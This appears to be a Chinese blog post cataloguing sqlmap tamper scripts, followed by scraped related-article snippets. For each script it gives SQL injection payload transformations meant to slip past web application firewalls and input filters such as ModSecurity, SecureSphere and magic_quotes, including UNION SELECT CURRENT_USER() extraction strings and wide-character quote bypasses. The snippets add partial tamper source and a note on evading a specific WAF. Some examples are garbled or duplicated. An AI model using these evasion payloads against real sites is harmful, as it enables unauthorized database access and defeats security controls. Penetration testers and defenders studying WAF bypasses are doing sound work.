Sqlmap Tamper大全

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。

本文旨在介绍tamper目录中的大部分插件,其中有的部分网上已经有了。

脚本名:apostrophemask.py

作用:用utf8代替引号

Example:

Default

1

2

("1 AND ‘1‘=‘1")

‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871‘

Tested against:

all

—————————————————————————————

文件名:equaltolike.py

作用:like 代替等号

Example:

Default

1

2

* Input: SELECT * FROM users WHERE id=1

* Output: SELECT * FROM users WHERE id LIKE 1

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

—————————————————————————————

脚本名:space2dash.py

作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

Example:

Default

1

2

(‘1 AND 9227=9227‘)

‘1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227‘

Tested against:

* MSSQL

* SQLite

—————————————————————————————

脚本名:greatest.py

作用:绕过过滤’>’ ,用GREATEST替换大于号。

Example:

Default

1

2

(‘1 AND A > B‘)

‘1 AND GREATEST(A,B+1)=A‘

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名:space2hash.py

作用:空格替换为#号 随机字符串 以及换行符

Example:

Default

1

2

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL

Tested against:

* MySQL 4.0, 5.0

——————————————————

脚本名:apostrophenullencode.py

作用:绕过过滤双引号,替换字符和双引号。

Example:

Default

1

2

tamper("1 AND ‘1‘=‘1")

‘1 AND %00%271%00%27=%00%271‘

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名:halfversionedmorekeywords.py

作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:

Default

1

2

("value‘ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa‘=‘QDWa")

"value‘/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND ‘QDWa‘=‘QDWa"

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

———————————————–

脚本名:space2morehash.py

作用:空格替换为 #号 以及更多随机字符串 换行符

Example:

Default

1

2

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL >= 5.1.13

Tested against:

* MySQL 5.1.41

——————————————

脚本名:appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

Example:

Default

1

2

(‘1 AND 1=1‘)

‘1 AND 1=1%00‘

Requirement:

* Microsoft Access

——————————————

脚本名:ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。

替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:

Default

1

2

(‘IFNULL(1, 2)‘)

‘IF(ISNULL(1),2,1)‘

Requirement:

* MySQL

* SQLite (possibly)

* SAP MaxDB (possibly)

Tested against:

* MySQL 5.0 and 5.5

——————————————

脚本名:space2mssqlblank.py(mssql)

作用:空格替换为其它空符号

Example:

Default

1

2

* Input: SELECT id FROM users

* Output: SELECT%08id%02FROM%0Fusers

Requirement:

* Microsoft SQL Server

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

# ASCII table:

Default

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

#   SOH     01      start of heading

#   STX     02      start of text

#   ETX     03      end of text

#   EOT     04      end of transmission

#   ENQ     05      enquiry

#   ACK     06      acknowledge

#   BEL     07      bell

#   BS      08      backspace

#   TAB     09      horizontal tab

#   LF      0A      new line

#   VT      0B      vertical TAB

#   FF      0C      new page

#   CR      0D      carriage return

#   SO      0E      shift out

#   SI      0F      shift in

————————————————-

脚本名:base64encode.py

作用:用base64编码替换

Example:

Default

1

2

("1‘ AND SLEEP(5)#")

‘MScgQU5EIFNMRUVQKDUpIw==‘

Requirement:

all

————————————————-

脚本名:space2mssqlhash.py

作用:替换空格

Example:

Default

1

2

(‘1 AND 9227=9227‘)

‘1%23%0AAND%23%0A9227=9227‘

Requirement:

* MSSQL

* MySQL

————————————————-

脚本名:modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释

Example:

Default

1

2

(‘1 AND 2&gt;1--‘)

‘1 /*!30874AND 2&gt;1*/--‘

Requirement:

* MySQL

Tested against:

* MySQL 5.0

————————————————-

脚本名:space2mysqlblank.py

作用:空格替换其它空白符号(mysql)

Example:

Default

1

2

* Input: SELECT id FROM users

* Output: SELECT%0Bid%0BFROM%A0users

Requirement:

* MySQL

Tested against:

* MySQL 5.1

Default

1

2

3

4

5

6

#   TAB     09      horizontal TAB

#   LF      0A      new line

#   FF      0C      new page

#   CR      0D      carriage return

#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)

#   -       A0      -                   (MySQL only)

———————————————————————————-

脚本名:between.py

作用:用between替换大于号(>)

Example:

Default

1

2

(‘1 AND A &gt; B--‘)

‘1 AND A NOT BETWEEN 0 AND B--‘

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

———————————————————————————-

脚本名:modsecurityzeroversioned.py

作用:包含了完整的查询与零版本注释

Example:

Default

1

2

(‘1 AND 2&gt;1--‘)

‘1 /*!00000AND 2&gt;1*/--‘

Requirement:

* MySQL

Tested against:

* MySQL 5.0

———————————————————————————-

脚本名:space2mysqldash.py

作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

91ri.org注:之前有个mssql的 这个是mysql的

Example:

Default

1

2

(‘1 AND 9227=9227‘)

‘1--%0AAND--%0A9227=9227‘

Requirement:

* MySQL

* MSSQL

———————————————————————————-

脚本名:multiplespaces.py

作用:围绕SQL关键字添加多个空格

Example:

Default

1

2

(‘1 UNION SELECT foobar‘)

‘1    UNION     SELECT   foobar‘

Tested against:

all

———————————————————————————-

脚本名:space2plus.py

作用:用+替换空格

Example:

Default

1

2

(‘SELECT id FROM users‘)

‘SELECT+id+FROM+users‘

Tested against:

all

———————————————————————————-

脚本名:bluecoat.py

作用:代替空格字符后与一个有效的随机空白字符的SQL语句。

然后替换=为like

Example:

Default

1

2

(‘SELECT id FROM users where id = 1‘)

‘SELECT%09id FROM users where id LIKE 1‘

Tested against:

* MySQL 5.1, SGOS

———————————————————————————-

脚本名:nonrecursivereplacement.py

双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如  .replace(“SELECT”、””)) filters

Example:

Default

1

2

(‘1 UNION SELECT 2--‘)

‘1 UNIOUNIONN SELESELECTCT 2--‘

Tested against:

all

———————————————————————————-

脚本名:space2randomblank.py

作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

Example:

Default

1

2

(‘SELECT id FROM users‘)

‘SELECT%0Did%0DFROM%0Ausers‘

Tested against:

all

———————————————————————————

脚本名:percentage.py

作用:asp允许每个字符前面添加一个%号

Example:

Default

1

2

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

Requirement:

* ASP

Tested against:

* Microsoft SQL Server 2000, 2005

* MySQL 5.1.56, 5.5.11

* PostgreSQL 9.0

———————————————————————————

脚本名:sp_password.py

作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example:

Default

1

2

(‘1 AND 9227=9227-- ‘)

‘1 AND 9227=9227-- sp_password‘

Requirement:

* MSSQL

———————————————————————————

脚本名:chardoubleencode.py 双url编码(不处理以编码的)

Example:

Default

1

2

* Input: SELECT FIELD FROM%20TABLE

* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

———————————————————————————

脚本名:unionalltounion.py

作用:替换UNION ALL SELECT UNION SELECT

Example:

Default

1

2

(‘-1 UNION ALL SELECT‘)

‘-1 UNION SELECT‘

Requirement:

all

——————————————————————————-

脚本名:charencode.py

作用:url编码

Example:

Default

1

2

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

  • Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
  • The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS

————————————————————

脚本名:randomcase.py

作用:随机大小写

Example:

Default

1

2

* Input: INSERT

* Output: InsERt

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

———————————————————————-

脚本名:unmagicquotes.py

作用:宽字符绕过 GPC  addslashes

Example:

Default

1

2

* Input: 1′ AND 1=1

* Output: 1%bf%27 AND 1=1–%20

Notes:

  • Useful for bypassing magic_quotes/addslashes feature

——————————————————————————–

脚本名:randomcomments.py

作用:用/**/分割sql关键字

Example:

Default

1

‘INSERT’ becomes ‘IN//S//ERT’

————————————————————————

脚本名:versionedkeywords.py

作用:Encloses each non-function keyword with versioned MySQL comment

Example:

Default

1

2

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:

* MySQL

—————————————————————————-

脚本名:charunicodeencode.py

作用:字符串 unicode 编码

Example:

Default

1

2

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

* ASP

* ASP.NET

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

* MySQL 5.1.56

* PostgreSQL 9.0.3

Notes:

  • Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

—————————————————————————-

脚本名:securesphere.py

作用:追加特制的字符串

Example:

Default

1

2

(‘1 AND 1=1‘)

"1 AND 1=1 and ‘0having‘=‘0having‘"

Tested against:

all

—————————————————————————-

脚本名:versionedmorekeywords.py

作用:注释绕过

Example:

Default

1

2

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

* MySQL >= 5.1.13

—————————————————————————-

脚本名:space2comment.py

作用:Replaces space character (‘ ‘) with comments ‘/**/’

Example:

Default

1

2

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

  • Useful to bypass weak and bespoke web application firewalls

—————————————————————————-

脚本名:halfversionedmorekeywords.py

作用:关键字前加注释

Example:

Default

1

2

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=‘QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=‘QDWa

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

—————————————————————————-

原文地址:http://www.91ri.org/7852.html

时间: 2024-10-05 00:32:17

Sqlmap Tamper大全的相关文章

sqlmap tamper绕过安全狗

可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def

sqlmap tamper编写

#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies()

SQLMAP tamper WAF 绕过脚本列表注释

sqlmap的tamper目录下有41个用于绕过waf的脚本,网上有文章简要介绍过使用方法,但是只是简单说了其中少数几个的作用.本人通过这41个脚本的文档注释,将它们每一个的作用简单标记了一下,还是像之前一样,先 google translate 再人工润色.其实,文档注释里面都有例子,看一眼就大概知道效果了,比看文字描述速度还快,只不过要用的时候现场翻看还是太麻烦了.我这个列表可以给大家提供参考,来更迅速的定位自己需要的脚本. 本人英文阅读能力有限,有个别词句(其实就2处)实在拿捏不准该如何翻

sqlmap tamper脚本扩展开发(Bypass IPS)

首先先对比一下两个自带的tamper脚本,看看sqlmap调用tamper有没有依赖什么类库或者算法. 例如调用tamper是导入之后调用脚本里的某函数,那么我们开发的tamper脚本也应该有调用要用到的函数,主要看算法吧,咳咳 先来看看base64encode.py #!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LI

sqlmap tamper 绕过waf

01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 对给定的payload全部字符使用Base64编码 05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”

小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint

sqlmap自动注入 Optimization [优化性能参数,可提高效率] -o:指定前三个参数(--predict-output.--keep-alive.--null-connection) --predict-output: 根据检测方法,比岁返回值和统计表内容,不断缩小检测范围,提高检测效率 可检测的返回值:版本名.用户名.密码.Privaleges.role.数据库名称.表名.列名 与--threads参数不兼容 统计表:/usr/share/sqlmap/txt/common-ou

如何使用SQLMAP绕过WAF

WAF(web应用防火墙)逐渐成为安全解决方案的标配之一.正因为有了它,许多公司甚至已经不在意web应用的漏洞.遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs. svn下载最新版本的sqlmap svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 我们关注的重点在于使用tamper脚本修改请求从而逃避WAF的规则检测.许多时候,你需要联合使用多个ta

sqlmap 的源码学习笔记一之目录结构

0x00 前言 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限.它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令.本文重点研究sqlmap的软件具体的目录结构,后续的文章也会从源码编写中,阐述sqlmap的种种编码结果.本文从结构中,可以看到sqlmap中的软件工程之美,同时从严谨的软件结构目录分类和构造中,看到sqlmap中的

SQLmap 使用笔记

SQLMap 的常用语法 1.sqlmap.py -u "www.xxx.com/news.asp?id=1"// 检查注入点 2.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-user// 获取当前用户名 3.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-db//获取数据库名,得到库admin 4.sqlmap.py -u "